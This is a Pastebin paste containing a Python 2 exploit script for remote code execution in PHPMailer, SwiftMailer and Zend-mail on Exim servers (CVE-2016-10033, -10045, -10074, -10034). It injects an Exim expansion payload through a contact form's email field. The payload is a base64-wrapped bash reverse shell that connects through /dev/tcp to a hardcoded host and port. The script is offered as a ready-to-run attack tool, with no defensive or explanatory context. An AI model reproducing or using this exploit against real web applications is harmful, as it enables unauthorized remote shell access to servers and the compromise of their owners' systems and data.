API tools faq
paste
Advertisement
AZZATSSINS_CYBERSERK

PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution

AZZATSSINS_CYBERSERK
Jun 22nd, 2017
752
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.08 KB | None | 0 0
raw download clone embed print report
  1. import argparse
  2. import urllib
  3. import urllib2
  4. import base64
  5.  
  6. # Prepare command for Exim expansion mode in order
  7. def prepare_cmd(cmd):
  8.     return '${run{${base64d:%s}}}' % base64.b64encode(cmd)
  9.  
  10. # Send Request method
  11. def send_request(req):
  12.     try:
  13.         urllib2.urlopen(req)
  14.     except urllib2.HTTPError, e:
  15.         print "[!] Got HTTP error: [%d] when trying to reach " + req.get_full_url() + " - Check the URL!\n\n" % e.code
  16.         exit(3)
  17.     except urllib2.URLError, err:
  18.         print "[!] Got the '%s' error when trying to reach " + req.get_full_url() + " - Check the URL!\n\n" % err.reason
  19.         exit(4)
  20.  
  21. # Parse input args
  22. parser = argparse.ArgumentParser(prog='rce_phpmailer_exim4.py', description='PHPMailer / Zend-mail / SwiftMailer - RCE Exploit for Exim4 based on LegalHackers sendmail version')
  23. parser.add_argument('-url', dest='WEBAPP_BASE_URL', required=True,  help='WebApp Base Url')
  24. parser.add_argument('-cf',  dest='CONTACT_SCRIPT',  required=True,  help='Contact Form scriptname')
  25. parser.add_argument('-ip',  dest='ATTACKER_IP',    required=True,  help='Attacker IP for reverse shell')
  26. parser.add_argument('-p',   dest='ATTACKER_PORT',  required=False, help='Attackers Port for reverse shell', default="8888")
  27. parser.add_argument('--post-action', dest='POST_ACTION',  required=False, help='Overrides POST "action" field name',         default="send")
  28. parser.add_argument('--post-name',   dest='POST_NAME',    required=False, help='Overrides POST "name of sender" field name', default="name")
  29. parser.add_argument('--post-email',  dest='POST_EMAIL',   required=False, help='Overrides POST "email" field name',          default="email")
  30. parser.add_argument('--post-msg',    dest='POST_MSG',     required=False, help='Overrides POST "message" field name',        default="msg")
  31. args = parser.parse_args()
  32.  
  33. CONTACT_SCRIPT_URL = args.WEBAPP_BASE_URL + args.CONTACT_SCRIPT
  34.  
  35. # Show params
  36. print """[+] Setting vars to: \n
  37. WEBAPP_BASE_URL      = [%s]
  38. CONTACT_SCRIPT       = [%s]
  39. ATTACKER_IP          = [%s]
  40. ATTACKER_PORT        = [%s]
  41. POST_ACTION          = [%s]
  42. POST_NAME            = [%s]
  43. POST_EMAIL           = [%s]
  44. POST_MSG             = [%s]
  45. """ % (args.WEBAPP_BASE_URL, args.CONTACT_SCRIPT, args.ATTACKER_IP, args.ATTACKER_PORT, args.POST_ACTION, args.POST_NAME, args.POST_EMAIL, args.POST_MSG)
  46.  
  47. # Ask for mail library
  48. print "[+] Choose your target / payload: "
  49. print "\033[1;34m"
  50. print """[1] PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)"""
  51. print """    SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)"""
  52. print """    Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)\n"""
  53. print """[2] PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045) - escapeshellarg() bypass"""
  54. print "\033[0m"
  55.  
  56. try:
  57.     target = int(raw_input('[?] Select target [1-2]: '))
  58. except ValueError:
  59.     print "Not a valid choice. Exiting\n"
  60.     exit(2)
  61.  
  62. if (target>2):
  63.     print "No such target. Exiting\n"
  64.     exit(3)
  65.  
  66. ################################
  67. # Payload
  68. ################################
  69. cmd = "/bin/bash -c '0<&196;exec 196<>/dev/tcp/192.168.1.19/1337;nohup sh <&196 >&196 2>&196 &'"
  70. prepared_cmd = prepare_cmd(cmd)
  71.  
  72. payload = '"a\\" -be ' + prepared_cmd + ' "@a.co'
  73.  
  74. # Update payloads for PHPMailer bypass (PHPMailer < 5.2.20)
  75. if target == 2:
  76.     payload = "\"a\\' -be " + prepared_cmd + " \"@a.co"
  77.  
  78. ################################
  79. # Attack episode
  80. # This step will execute the reverse shell
  81. ################################
  82.  
  83. # Form fields
  84. post_fields = {'action': "%s" % args.POST_ACTION, "%s" % args.POST_NAME: 'Jas Fasola', "%s" % args.POST_EMAIL: payload, "%s" % args.POST_MSG: 'Really important message'}
  85.  
  86. # Print relevant information
  87. print "\n[+] Executing command on victim server\n"
  88. print '[!] command: [%s]' % cmd
  89. print '[!] payload: [%s]' % payload
  90. print '[!] post_fields: [%s]\n' % str(post_fields)
  91.  
  92. data = urllib.urlencode(post_fields)
  93. req = urllib2.Request(CONTACT_SCRIPT_URL, data)
  94. send_request(req)
  95.  
  96. print "\033[1;32m[+] You should check your listener and cross the fingers ;)\033[0m\n"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!